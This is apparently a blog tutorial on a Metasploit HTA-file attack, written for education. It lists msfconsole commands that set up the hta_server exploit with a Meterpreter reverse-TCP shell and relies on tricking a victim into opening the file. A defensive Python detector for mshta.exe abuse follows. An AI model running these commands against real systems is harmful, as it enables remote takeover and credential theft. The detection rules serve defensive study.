Dear Tecnogalaxy readers, are you still wondering about an article with such a strange title? Yes, today we are going to see a technique that, if used by an attacker, could put our computer security at risk, all just by opening a simple file! Crazy if you think about it.

Let's get into the mind of a hacker who has to steal user IDs and passwords to access various systems and files, and then sell this information on the dark web. As a first step, he will study the field of attack and the strategy to put in place, covering both the technical side and social engineering.

Obviously this test is for educational purposes only. I do not assume any responsibility for what you will do; hacking someone else's system without permission is punishable by law.

How the infected file attack works

We start immediately with our test, as always using our dear friend Kali Linux. We open a shell and write the following commands:

ifconfig      # retrieve our IP address
msfconsole    # start msfconsole

Now we need to select the module to use, so let's write the commands:

use exploit/windows/misc/hta_server
set lhost "our ip address"
set srvhost "our ip address"
set payload windows/meterpreter/reverse_tcp
set lport 8111

Let’s launch the exploit:


At this point the tool generates the file that the attacker will send to the victim, who downloads it from the following link:

Now the social engineering technique comes into play: the success of the attack will depend on the ability of the attacker to induce the victim to open the newly generated file.

Do not open this file (example of hacker attack)

Once the file is opened, the victim's computer connects back to the attacker's listening system, which takes control of the entire machine.

As we have seen, opening a file without being 100% sure of its origin could put your system and the entire company network at risk.

You have to be wary on the web and always check in detail the origin of any file, email, link, etc.
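
On the defensive side, this kind of file leaves traces: on Windows an HTA file is run by mshta.exe, so process-creation logs show when it starts and what it launches. The Python code below is an added example, not part of the original article; the event fields (modelled on Sysmon Event ID 1), the rule names and the process lists are assumptions, and the sample events are constructed.

```python
import re

# Constructed process-creation events (fields modelled on Sysmon Event ID 1).
# Hosts, users, paths and addresses are invented for this example.
SAMPLE_EVENTS = [
    {"host": "pc-01", "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r'"C:\Windows\System32\mshta.exe" "C:\Users\anna\Downloads\invoice.hta"',
     "parent_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
    {"host": "pc-01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile",
     "parent_image": r"C:\Windows\System32\mshta.exe"},
    {"host": "pc-02", "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe http://192.0.2.10/doc.hta",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"host": "pc-03", "image": r"C:\Windows\System32\notepad.exe",
     "command_line": r"notepad.exe C:\Users\leo\notes.txt",
     "parent_image": r"C:\Windows\explorer.exe"},
]

# Assumed lists; tune them to the software in your own environment.
INTERNET_FACING = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}
URL_RE = re.compile(r"https?://", re.I)
USER_DIR_HTA_RE = re.compile(r'\\(downloads|temp|inetcache)\\[^"]*\.hta', re.I)

def basename(path):  # last component of a Windows path, lower-cased
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def check_event(ev):
    """Return the names of the rules this event matches."""
    hits = []
    image, parent = basename(ev["image"]), basename(ev["parent_image"])
    if image == "mshta.exe":
        if URL_RE.search(ev["command_line"]):           # HTA loaded straight from a URL
            hits.append("mshta-remote-url")
        if USER_DIR_HTA_RE.search(ev["command_line"]):  # HTA saved by a download or mail
            hits.append("mshta-hta-from-user-dir")
        if parent in INTERNET_FACING:                   # opened from a browser or mail client
            hits.append("mshta-launched-by-browser-or-mail")
    if parent == "mshta.exe" and image in SHELLS:       # the HTA started another program
        hits.append("mshta-spawned-shell")
    return hits

def scan(events):
    """Return (host, image, hits) for every event that matched a rule."""
    return [(ev["host"], basename(ev["image"]), hits)
            for ev in events if (hits := check_event(ev))]

if __name__ == "__main__":
    print(*scan(SAMPLE_EVENTS), sep="\n")
```

Where HTA files are not needed for work, blocking mshta.exe with an application control policy removes this path entirely.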

As always, make good use of it by running tests on your own device or computer; running them on devices or computers that are not yours is illegal.

To the next article!

N.B.: I don't assume any responsibility for the use that you will make of this guide, as it is written for didactic and educational purposes.
